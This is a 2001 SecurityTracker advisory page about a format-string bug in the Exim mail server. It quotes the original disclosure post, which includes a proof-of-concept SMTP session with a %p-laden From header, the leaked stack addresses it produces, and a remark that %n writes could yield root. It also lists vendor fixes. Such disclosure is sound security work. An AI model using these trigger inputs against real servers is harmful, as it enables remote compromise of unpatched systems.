SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (E-mail Server)  >   Exim Vendors:   Exim.org
Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
SecurityTracker Alert ID:  1001694
SecurityTracker URL:  http://securitytracker.com/id/1001694
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 6 2001
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Exim mail server that may allow a remote user to execute arbitrary code on the server.

It is reported that when Exim is configured to check incoming mail headers for proper syntax, the vulnerability can be triggered. This is configured through the /etc/exim.conf headers_check_syntax option. By default, this option is not set.

The vulnerability reportedly exists in the accept.c module where the moan_smtp_batch() function is called.

A demonstration exploit transcript is provided in the Source Message.
Impact:   A remote user can execute arbitrary code on the server with root-level privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exim.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Releases Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (Wichert Akkerman <wichert@cistron.nl>)
Debian has released a fix.
(Conectiva Issues Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (secure@conectiva.com.br)
Conectiva has issued a fix.
(Red Hat Provides Fix) Re: Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server   (bugzilla@redhat.com)
Red Hat has provided a fix.


 Source Message Contents
Date:  Wed, 6 Jun 2001 14:03:25 +0200
Subject:  lil' exim format bug


Hi BugTrackers

Just a little bug to tell:


THE BUG
-------

accept.c, line 2506:
	else if (smtp_reply != NULL) moan_smtp_batch(NULL, smtp_reply);

while moan_smtp_batch is like this:
	moan_smtp_batch(char *cmd_buffer, char *format, ...)

So when smtp_reply contains format strings, it get transformed by
moan_smtp_batch().


Why I said that it's a little bug?
----------------------------------

This piece of code is only executed when exim is configured to check incoming mails' headers:
/etc/exim.conf should have an option set:
headers_check_syntax

By default it's turned OFF.
only few ppl turn it on.

So it's NOT vulnerable BY DEFAULT.


Exploitation:
-------------

Try this:
===8<======8<=======8<======
lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

.
===8<======8<=======8<=======

Somewhere in the answers you should see:
550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get
 root out of this bug.

No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man.
-- 
Megyer Laszlo (Lez)
lez@sch.bme.hu


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC